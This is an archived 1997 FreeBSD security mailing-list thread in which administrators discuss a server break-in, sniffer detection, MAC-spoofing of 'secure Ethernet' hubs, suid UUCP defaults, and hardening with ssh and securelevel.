Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id KAA02282 for security-outgoing; Tue, 29 Jul 1997 10:51:56 -0700 (PDT) Received: from destiny.erols.com (root@destiny.erols.com [207.96.73.65]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id KAA02275; Tue, 29 Jul 1997 10:51:40 -0700 (PDT) Received: from destiny.erols.com (vngnce@destiny.erols.com [207.96.73.65]) by destiny.erols.com (8.8.6/8.6.12) with SMTP id NAA17740; Tue, 29 Jul 1997 13:51:07 -0400 (EDT) Date: Tue, 29 Jul 1997 13:51:06 -0400 (EDT) From: John Dowdal To: Gary Palmer cc: Vincent Poy , security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: <2482.870154831@orion.webspan.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 29 Jul 1997, Gary Palmer wrote: > Vincent Poy wrote in message ID > : > > I've done that before too... If I don't mention legal action, > > they will never respond. I guess they just think it's not their system so > > they could care less. > > Don't think that about Erols until you try ... I know the person who > answers the abuse mail. I think he'd be offended by that statement. > I have had very good response from erols a couple weeks ago when reporting a hacked account which was used to harrass people on IRC (he de-activated three accounts). I simply sent accurate /whois and date/time info to abuse@erols.com and got a response within minutes. Cool guy :) When I mentioned legal action, I was referring to the phone, not email. When you call their support number, they have a lot of clueless kids who read scripts. They are well-trained not to pass calls on to important people. IMHO, this is their biggest problem, but don't know if I could really do better given the number of windoze lusers they serve. TS: Is your modem plugged into the phone line? LU: Modem? What modem? TS: You need a modem and a phone line to use our service. LU: Whats that? or LU: I call the access numbers and hear funny noises TS: You need to call the access numbers with your computer's modem. LU: Mean I need a computer to access your service!? John From owner-freebsd-security Tue Jul 29 12:08:04 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA06406 for security-outgoing; Tue, 29 Jul 1997 12:08:04 -0700 (PDT) Received: from critter.dk.tfs.com (critter.phk.freebsd.dk [195.8.133.1]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA06364 for ; Tue, 29 Jul 1997 12:07:55 -0700 (PDT) Received: from critter.dk.tfs.com (localhost [127.0.0.1]) by critter.dk.tfs.com (8.8.6/8.8.5) with ESMTP id VAA00286; Tue, 29 Jul 1997 21:06:13 +0200 (CEST) To: Christopher Petrilli cc: Warner Losh , Robert Watson , security@FreeBSD.ORG From: Poul-Henning Kamp Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD) In-reply-to: Your message of "Tue, 29 Jul 1997 12:52:38 EDT." Date: Tue, 29 Jul 1997 21:06:13 +0200 Message-ID: <284.870203173@critter.dk.tfs.com> Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk In message , Christo pher Petrilli writes: >On Tue, 29 Jul 1997, Warner Losh wrote: > >> In message Rober >t Watson writes: >> : host. Promiscuous mode simply disables the filter. The only way to >> : prevent the packets from being sniffable is to prevent them from going on >> : the wire in question -- smart hubs (switches) do this, so are desirable. >> >> Well, there is strong encryption. While it doesn't prevent sniff of >> the packets, per se, it generally leaves you with garbage and produces >> the same net effect. > >I will note that there are a few people (ODS and Bay Networks included) >who make what is called "secure Ethernet", which basically learns what MAC >address is on each port, and scrambles frames that are not destined for >that MAC. What usually happens is it replkaces the data paylode with >alternating 0/1, and fixes the checksum. It works just fine :-) It's >also generally cheaper than a switch. Except that most of them are easy to spoof: Set up your sniffer to output 10 packets with different "from" MAC and it figures "hey port #4 is upstream, send it everything..." -- Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. whois: [PHK] | phk@tfs.com TRW Financial Systems, Inc. Power and ignorance is a disgusting cocktail. From owner-freebsd-security Tue Jul 29 12:30:29 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA07524 for security-outgoing; Tue, 29 Jul 1997 12:30:29 -0700 (PDT) Received: from shell.monmouth.com (root@shell.monmouth.com [205.164.220.9]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA07516 for ; Tue, 29 Jul 1997 12:30:26 -0700 (PDT) Received: from i4got.lakewood.com (fh-ppp17.monmouth.com [205.164.221.49]) by shell.monmouth.com (8.8.5/8.7.3) with ESMTP id PAA26631; Tue, 29 Jul 1997 15:28:01 -0400 (EDT) Received: (from pechter@localhost) by i4got.lakewood.com id PAA12852 (8.8.5/IDA-1.6); Tue, 29 Jul 1997 15:30:10 -0400 (EDT) From: Bill Pechter Message-ID: <199707291930.PAA12852@i4got.lakewood.com> Subject: Re: security hole in FreeBSD To: adam@homeport.org (Adam Shostack) Date: Tue, 29 Jul 1997 15:30:10 -0400 (EDT) Cc: freebsd-security@freebsd.org In-Reply-To: <199707291855.OAA14671@homeport.org> from Adam Shostack at "Jul 29, 97 02:55:21 pm" Reply-to: pechter@lakewood.com X-Phone-Number: 908-389-3592 X-Mailer: ELM [version 2.4ME+ PL19 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk FreeBSD'ers Adam and I have been debating this one offline a bit. I brought this one back to freebsd-security to see if I'm the only one that has a problem with removing suid from uucp or removing uucp from the base distribution -- I'll avoid continuing this if others here think I should drop this one. I don't want to suck bandwidth if there's not a serious effort to change the way FreeBSD ships. It may be I'm just having a bad day -- but I think: The day FreeBSD stops including stuff like UUCP in the base system is the day I find another (NetBSD/OpenBSD/Linux) OS. I like the fact it is ALL of Unix. Put a package together that will shut down the SUID stuff -- keep this out of the standard distribution. Most linux admins have never seen Cops/Tripwire/TCP Wrappers. If you're allowing others to connect to your machine you need to determine the amount of risk you are willing to allow and work to decide how to protect yourself. Inherent with connectivity is risk. Inherent with protection is knowing that NO machine is automatically secure out of the box. I worked with a number of commercial Unix systems running C2 and B2 security and they all came in an unsecure manner and you turned on the audit and security features used to bring them to a more secure level. If you want to connect to the internet then YOU need to firewall/harden the security of the system. If you're running it as an IN-HOUSE machine you may not care about maximizing security. It's a base-level functionality vs. security debate. > From: Adam Shostack > | > > | > I don't deny there are people doing it, but anyone who wants > | > to run UUCP knows enough to turn it on. Most people don't use it; > | > there exists a potential of a security hole, it should ship turned > | > off, possibly with a script to turn it on. > | > > | > Want to take a stab at how many Freebsd users know what HDB > | > stands for? How it differs from Taylor? Heck, how many know what > | > uucp stands for? > | > > | > Adam > | > | Bill Pechter wrote: > | Everyone I taught Unix admin knows all of that. Anyone doing Unix admin > | should know that. > > From: Adam Shostack > > Should, but do they? This guy with the problem sure doesn't. Most > linux admins don't, if you read the cert summaries. We need to > improve the baseline. You and I, and anyone else who wants to run > UUCP can turn it on. Bill ------------------------------------------------------------------------------ Bill Pechter | 17 Meredith Drive Tinton Falls, NJ 07724 | 908-389-3592 pechter@lakewood.com | Save computing history, give an old geek old hardware. This msg brought to you by the letters PDP and the number 11. From owner-freebsd-security Tue Jul 29 12:38:31 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA08015 for security-outgoing; Tue, 29 Jul 1997 12:38:31 -0700 (PDT) Received: from nexus.astro.psu.edu (nexus.astro.psu.edu [128.118.147.20]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id MAA08007 for ; Tue, 29 Jul 1997 12:38:28 -0700 (PDT) Received: from mstar.astro.psu.edu by nexus.astro.psu.edu (4.1/Nexus-1.3) id AA14852; Tue, 29 Jul 97 15:38:23 EDT Received: by mstar.astro.psu.edu (SMI-8.6/Client-1.3) id PAA03520; Tue, 29 Jul 1997 15:38:15 -0400 Message-Id: <19970729153815.19286@astro.psu.edu> Date: Tue, 29 Jul 1997 15:38:15 -0400 From: Matthew Hunt To: Poul-Henning Kamp Cc: security@FreeBSD.ORG Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD) Reply-To: Matthew Hunt References: <284.870203173@critter.dk.tfs.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.76 In-Reply-To: <284.870203173@critter.dk.tfs.com>; from Poul-Henning Kamp on Tue, Jul 29, 1997 at 09:06:13PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, Jul 29, 1997 at 09:06:13PM +0200, Poul-Henning Kamp wrote: > Except that most of them are easy to spoof: Set up your sniffer to > output 10 packets with different "from" MAC and it figures "hey port > #4 is upstream, send it everything..." I think some can be configured with hardcoded associations between the MAC and port, rather than learning them on their own. Such beasts are used for the residence hall networks at Penn State. From owner-freebsd-security Tue Jul 29 12:43:50 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA08379 for security-outgoing; Tue, 29 Jul 1997 12:43:50 -0700 (PDT) Received: from chaos.amber.org (root@chaos.amber.org [205.231.232.12]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA08366 for ; Tue, 29 Jul 1997 12:43:43 -0700 (PDT) Received: from chaos.amber.org (petrilli@chaos.amber.org [205.231.232.12]) by chaos.amber.org (8.7.5/8.6.12) with SMTP id PAA23807; Tue, 29 Jul 1997 15:43:23 -0400 (EDT) Date: Tue, 29 Jul 1997 15:43:21 -0400 (EDT) From: Christopher Petrilli To: Poul-Henning Kamp cc: Warner Losh , Robert Watson , security@FreeBSD.ORG Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD) In-Reply-To: <284.870203173@critter.dk.tfs.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > >I will note that there are a few people (ODS and Bay Networks included) > >who make what is called "secure Ethernet", which basically learns what MAC > >address is on each port, and scrambles frames that are not destined for > >that MAC. What usually happens is it replkaces the data paylode with > >alternating 0/1, and fixes the checksum. It works just fine :-) It's > >also generally cheaper than a switch. > > Except that most of them are easy to spoof: Set up your sniffer to > output 10 packets with different "from" MAC and it figures "hey port well, it does only allow a MAC to appear once, so you would realise this quite quickly. But a switch is the same as well, unless you've hard coaded VLAN type information based on MAC addresses into the switch---which is unmaintainable. Christopher From owner-freebsd-security Tue Jul 29 13:04:44 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id NAA09405 for security-outgoing; Tue, 29 Jul 1997 13:04:44 -0700 (PDT) Received: from usr03.primenet.com (root@usr03.primenet.com [206.165.6.203]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id NAA09398 for ; Tue, 29 Jul 1997 13:04:40 -0700 (PDT) Received: from frontera (mario1@ip62-196.vcv.primenet.com [207.218.62.196]) by usr03.primenet.com (8.8.5/8.8.5) with SMTP id NAA06507; Tue, 29 Jul 1997 13:03:49 -0700 (MST) Date: Tue, 29 Jul 1997 13:07:55 -0700 (Pacific Daylight Time) From: "[Mario1-]" To: Vincent Poy cc: Nate Williams , "Jonathan A. Zdziarski" , security@freebsd.org, JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: X-X-Sender: Mario1@imap.primenet.com MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Vincent Poy wrote: : Date: Mon, 28 Jul 1997 21:12:44 -0700 (PDT) : From: Vincent Poy : To: Nate Williams : Cc: "Jonathan A. Zdziarski" , security@freebsd.org, : JbHunt , "[Mario1-]" : Subject: Re: security hole in FreeBSD : : On Mon, 28 Jul 1997, Nate Williams wrote: : : =)Vincent Poy writes: : =)> Apparently FreeBSD ships with .rhosts in the root account. : =) : =)Apparently you've yet to find a clue. Go rub yourself with clue juice, : =)and dance the clue dance, and maybe you'll get one. : Thanks so much for the above Nate. That was real helpful. : Nothing is unhackable. and the hacker did say it was the .rhosts : file along with perl5.00401 that did it. Nothing is foolproof. Exactly. Regards, -- Mario1@PrimeNet.Com http://www.primenet.com/~mario1 Eskimo Democracy: "If you continue to subscribe to this list only to publically oppose any descision nanook or I make, I'm going to disallow you post permission to this list." dwild@eskimo.com From owner-freebsd-security Tue Jul 29 13:08:09 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id NAA09654 for security-outgoing; Tue, 29 Jul 1997 13:08:09 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id NAA09618 for ; Tue, 29 Jul 1997 13:08:01 -0700 (PDT) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.8.5/8.8.5) id QAA15592; Tue, 29 Jul 1997 16:07:57 -0400 (EDT) Date: Tue, 29 Jul 1997 16:07:57 -0400 (EDT) From: Garrett Wollman Message-Id: <199707292007.QAA15592@khavrinen.lcs.mit.edu> To: Christopher Petrilli Cc: Poul-Henning Kamp , Warner Losh , Robert Watson , security@FreeBSD.ORG Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD) In-Reply-To: References: <284.870203173@critter.dk.tfs.com> Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk < said: > well, it does only allow a MAC to appear once, so you would realise this > quite quickly. But a switch is the same as well, unless you've hard > coaded VLAN type information based on MAC addresses into the > switch---which is unmaintainable. But which some organizations do anyway, because it allows them to force their users to get permission to install any new machine. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick From owner-freebsd-security Tue Jul 29 13:10:37 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id NAA09914 for security-outgoing; Tue, 29 Jul 1997 13:10:37 -0700 (PDT) Received: from usr03.primenet.com (root@usr03.primenet.com [206.165.6.203]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id NAA09901; Tue, 29 Jul 1997 13:10:31 -0700 (PDT) Received: from frontera (mario1@ip62-196.vcv.primenet.com [207.218.62.196]) by usr03.primenet.com (8.8.5/8.8.5) with SMTP id NAA06883; Tue, 29 Jul 1997 13:10:29 -0700 (MST) Date: Tue, 29 Jul 1997 13:14:36 -0700 (Pacific Daylight Time) From: "[Mario1-]" To: Gary Palmer cc: Vincent Poy , Nate Williams , "Jonathan A. Zdziarski" , security@FreeBSD.ORG, JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: <29452.870154093@orion.webspan.net> Message-ID: X-X-Sender: Mario1@imap.primenet.com MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 29 Jul 1997, Gary Palmer wrote: : : 3) Did you really talk to him on irc, or just some lamer pretending to : have done the hack? : It was him, there is no doubt about that. He goes by the nick TheCa on IRC, and seems quite proud of his "work". : and most importantly: : : 4) did you LEARN from this experience? If not, *WHY* not? Oh yeah. But it seems no matter how much one learns, there are still more lessons ahead. Regards, -- Mario1@PrimeNet.Com http://www.primenet.com/~mario1 Eskimo Democracy: "If you continue to subscribe to this list only to publically oppose any descision nanook or I make, I'm going to disallow you post permission to this list." dwild@eskimo.com From owner-freebsd-security Tue Jul 29 13:40:00 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id NAA11385 for security-outgoing; Tue, 29 Jul 1997 13:40:00 -0700 (PDT) Received: from verdi.nethelp.no (verdi.nethelp.no [195.1.171.130]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id NAA11380 for ; Tue, 29 Jul 1997 13:39:55 -0700 (PDT) From: sthaug@nethelp.no Received: (qmail 4204 invoked by uid 1001); 29 Jul 1997 20:39:45 +0000 (GMT) To: pechter@lakewood.com Cc: adam@homeport.org, freebsd-security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Your message of "Tue, 29 Jul 1997 15:30:10 -0400 (EDT)" References: <199707291930.PAA12852@i4got.lakewood.com> X-Mailer: Mew version 1.05+ on Emacs 19.28.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Tue, 29 Jul 1997 22:39:45 +0200 Message-ID: <4202.870208785@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > I brought this one back to freebsd-security to see if I'm the only one that > has a problem with removing suid from uucp or removing uucp from the base > distribution -- ... > It may be I'm just having a bad day -- but I think: > > The day FreeBSD stops including stuff like UUCP in the base system is the > day I find another (NetBSD/OpenBSD/Linux) OS. > > I like the fact it is ALL of Unix. Put a package together that will > shut down the SUID stuff -- keep this out of the standard distribution. > > Most linux admins have never seen Cops/Tripwire/TCP Wrappers. If you're > allowing others to connect to your machine you need to determine the amount > of risk you are willing to allow and work to decide how to protect yourself. > Inherent with connectivity is risk. Inherent with protection is knowing > that NO machine is automatically secure out of the box. > > I worked with a number of commercial Unix systems running C2 and B2 security > and they all came in an unsecure manner and you turned on the audit and > security features used to bring them to a more secure level. There's unsecure and there's unsecure. SunOS 5.5.1 is more secure than SunOS 4.1.4 out of the box. I've heard some people complain, but most admins seem to like it. I like the FreeBSD distributions - but I would be much happier if there was an easy way to make a system more secure. For instance a document which told you: - These files are only necessary if you need functionality X (uucp is an example here). If you don't need functionality X, they can be safely removed. - These files have setuid (setgid) for such and such a reason. If you don't need that functionality, the setuid (setgid) bit can be removed. (eg. the setuid bit on /usr/bin/login - only needed if you want to login to another user without logging out first.) - Here's what you need to set up a reasonable changeroot environment. If such a document was accompanied by scripts to help you do the job, even better. Yes, I'm willing to help to create such a document. Steinar Haug, Nethelp consulting, sthaug@nethelp.no From owner-freebsd-security Tue Jul 29 14:23:40 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id OAA13916 for security-outgoing; Tue, 29 Jul 1997 14:23:40 -0700 (PDT) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id OAA13910; Tue, 29 Jul 1997 14:23:35 -0700 (PDT) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id OAA09789; Tue, 29 Jul 1997 14:23:36 -0700 (PDT) To: Vincent Poy cc: Gary Palmer , Nate Williams , "Jonathan A. Zdziarski" , security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Mon, 28 Jul 1997 22:35:36 PDT." Date: Tue, 29 Jul 1997 14:23:36 -0700 Message-ID: <9785.870211416@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > =)4) did you LEARN from this experience? If not, *WHY* not? > > Ofcourse... never trust anyone on the system. Too bad there Erm - I guess that answers the question: You didn't. :-) The moral to this story wasn't that you should never trust anyone on the system - that's a given anyway and you should know basic things like that before ever even thinking of selling your services as a system admin. The real moral here is that you should be able to trust your admins to properly secure your system and make contingency plans beforehand for when and if the worst happens. Jordan From owner-freebsd-security Tue Jul 29 14:46:38 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id OAA15108 for security-outgoing; Tue, 29 Jul 1997 14:46:38 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id OAA15103 for ; Tue, 29 Jul 1997 14:46:35 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id OAA11298; Tue, 29 Jul 1997 14:46:12 -0700 (PDT) Date: Tue, 29 Jul 1997 14:46:11 -0700 (PDT) From: Vincent Poy To: Robert Watson cc: Brian Buchanan , freebsd-security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: securelevel (was: Re: security hole in FreeBSD) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 29 Jul 1997, Robert Watson wrote: =)On Mon, 28 Jul 1997, Vincent Poy wrote: =) =)> On Mon, 28 Jul 1997, Brian Buchanan wrote: =)> =)> =)Uh, that would defeat the purpose of securelevel. It's not supposed to be =)> =)possible to ever lower it, except when dropping into single-user mode, and =)> =)even allowing init to do so in that instance is risky IMHO - a few months =)> =)ago I reported a hole, which I believe was fixed, that made it possible to =)> =)lower the securelevel by attaching a debugger to init. Even though that's =)> =)plugged now, it's still possible that there's another way to fool the =)> =)kernel into thinking that process 1 is requesting that securelevel be =)> =)lowered. =)> =)> Anything is possible since nothing is unhackable. Would running =)> init at securelevel 2 and then have it reboot multi-user at a lower level =)> be possible? =) =)I disagree with the assertation that nothing is unhackable. My toaster is =)unhackable. :) Depending on how you define hack, of course. But in a =)similar vein: you say you have been carefully following the latest version =)releases, and patching all known bugs. That is not sufficient. A site =)needs a good security policy as well as patching known bugs. For example, =)you should have been using ssh the entire time, and have copied the public =)keys for the hosts to your client machine using sneaker-net. Sending any =)unencrypted data to/from a host, especially sensitive information like the =)root password, is an extremely bad idea. You would think your toaster is unhackable. So is a Leica camera lens but they still have ways to hack it. Also, just for your information, the root password isn't even used that often. It is only used every time the machine boots up since I run screen and I am connected 24 x7 and reattach the screen session when necessary. =)Similarly, careful analysis of the trust relationships between the =)machines and accounts on the machines is important -- constructing a bad =)DNS structure can invalidate your whole security design, as if DNS is =)corrupted, all the .rhosts stuff is vulnerable. Ideally, you would only =)use .rhosts in combination with SSH, and then make sure that the =)appropriate keys are in /etc/ssh_whatever, and deny connections that did =)not match the predefined keys of all hosts. Key distribution is one of =)the big downsides to SSH, but floppy disks can help here. I was considering installing ssh but there is only one problem. I use Win95 from my own side at times for various reasons as well as the other remote admins. So a ssh client does cost money. We're volunteers and are not getting paid in any shape or form. =)Applications like web servers may themselves represent no immediate or =)known security problems, but often-times web servers use third party CGI =)programs, available publicly in source, or written by a third party for =)the web server. Many web programs are notoriously sloppy (or ignorant), =)and this has not been helped by the release of a number of CGI programming =)books that haven't even touched on the issue of security. It has been =)shown time and time again that greater access for an attacker increases =)risk, and most CGI bugs allow shell access to the host, albeit as www or =)nobody. Even those are problematic. And once someone is in to the =)system, they can get around simple solutions like disabling inetd. In 15 =)seconds, I can compile and run a daemon that lets me back into an account =)on a higher port number, and unless you know your tools are good, and how =)to use them, you won't be able to tell. I certainly won't appear in the =)logs. :) That's true but I am logged on 10 times also and you would only see me logged in for once idled 4 days when I wasn't even idle for 2 seconds. Those aren't in the logs either. That's why when this hacker was talking to jbhunt, he deleted netstat but I managed to get it from another machine and tracked him down and killed his connection. jbhunt was running a portscanner to check for any daemons running on a higher port number but didn't find any. =)In the case of someone else's machine, you probably can't do anything to =)get rid of the CGI problems, so that really leaves you with just =)minimizing the risks in the OS. You've already touched on SUID programs =)-- as many as possible should be disabled. If you have console access, =)just disable root also, as you can login as root directly. Most programs =)do not require suid, if you don't mind administrating as root. Su'ing to =)root is clearly a risky activity, especially if you're logged in =)unencrypted. Setting a high secure-level, as well as mounting all file =)systems w/o setuid support, can make a big difference. Mount all file =)systems but root as nodev, and things should move along some also. True but the problem is we wished we had console access. If we did, none of this would even happened I think. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Tue Jul 29 14:58:27 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id OAA15610 for security-outgoing; Tue, 29 Jul 1997 14:58:27 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id OAA15604 for ; Tue, 29 Jul 1997 14:58:25 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id OAA11345; Tue, 29 Jul 1997 14:58:15 -0700 (PDT) Date: Tue, 29 Jul 1997 14:58:14 -0700 (PDT) From: Vincent Poy To: "Rodney W. Grimes" cc: security@freebsd.org, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: <199707291559.IAA20259@GndRsh.aac.dev.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 29 Jul 1997, Rodney W. Grimes wrote: =)33 mail message from ``Vinnie'' this morning in my mail box, SNR 1:33, =)I'm not a happy camper :-(. Sorry Rod and everyone, I never meant for this to be a long thread in the first place. I just thought someone might know how they got in. =)Vince, I understand you have a security problem, could you please go =)purchase 3 good books on security (thier should be at least 1 or 2 =)mentioned in the FreeBSD handbook, if not could someone on the =)list please provide Vince a list of ORA books on security). That would be a good idea too. I just wished I had console access to the machines. =)I know this mailling list is for FreeBSD security related issues, but =)the level of the questions and answerers being poised here is at the =)fundemental level of unix system security and the answers can be found =)in any good book. True, however I wasn't talking about stuff we already know about, there are always unknown things it seems. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Tue Jul 29 15:03:11 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA15845 for security-outgoing; Tue, 29 Jul 1997 15:03:11 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA15837; Tue, 29 Jul 1997 15:03:03 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id PAA11374; Tue, 29 Jul 1997 15:02:39 -0700 (PDT) Date: Tue, 29 Jul 1997 15:02:39 -0700 (PDT) From: Vincent Poy To: John Dowdal cc: Gary Palmer , security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 29 Jul 1997, John Dowdal wrote: =)On Tue, 29 Jul 1997, Gary Palmer wrote: =) =)> Don't think that about Erols until you try ... I know the person who =)> answers the abuse mail. I think he'd be offended by that statement. =)> =) =)I have had very good response from erols a couple weeks ago when reporting =)a hacked account which was used to harrass people on IRC (he de-activated =)three accounts). I simply sent accurate /whois and date/time info to =)abuse@erols.com and got a response within minutes. Cool guy :) I have mailed abuse@erols.com last night and again this morning and still haven't heard back from them yet. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Tue Jul 29 15:30:35 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA17208 for security-outgoing; Tue, 29 Jul 1997 15:30:35 -0700 (PDT) Received: from verdi.nethelp.no (verdi.nethelp.no [195.1.171.130]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id PAA17189 for ; Tue, 29 Jul 1997 15:30:28 -0700 (PDT) From: sthaug@nethelp.no Received: (qmail 5885 invoked by uid 1001); 29 Jul 1997 22:30:24 +0000 (GMT) To: vince@mail.MCESTATE.COM Cc: freebsd-security@FreeBSD.ORG Subject: Re: securelevel (was: Re: security hole in FreeBSD) In-Reply-To: Your message of "Tue, 29 Jul 1997 14:46:11 -0700 (PDT)" References: X-Mailer: Mew version 1.05+ on Emacs 19.28.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Wed, 30 Jul 1997 00:30:24 +0200 Message-ID: <5883.870215424@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk [cc list trimmed] > I was considering installing ssh but there is only one problem. > I use Win95 from my own side at times for various reasons as well as > the other remote admins. So a ssh client does cost money. We're > volunteers and are not getting paid in any shape or form. The ssh client for Windows is $99. Educational sites are eligible for a 50% discount. Or you could run the FreeBSD version - for free. It sounds like you're saying that the extra hassle you and your fellow system administrators (and your users) are having because of the breakin is worth less that $99. Are you sure you have your priorities straight? (For comparison - I run ssh for practically *all* remote logins, even on the same LAN. ssh won't solve all your security problems, but it can be an important *part* of better security.) With respect to passwords, your goal should be that no password is sent in the clear. Ever. This is difficult to reach, but you'll find it helps you to focus on security quite a bit. Steinar Haug, Nethelp consulting, sthaug@nethelp.no From owner-freebsd-security Tue Jul 29 15:44:56 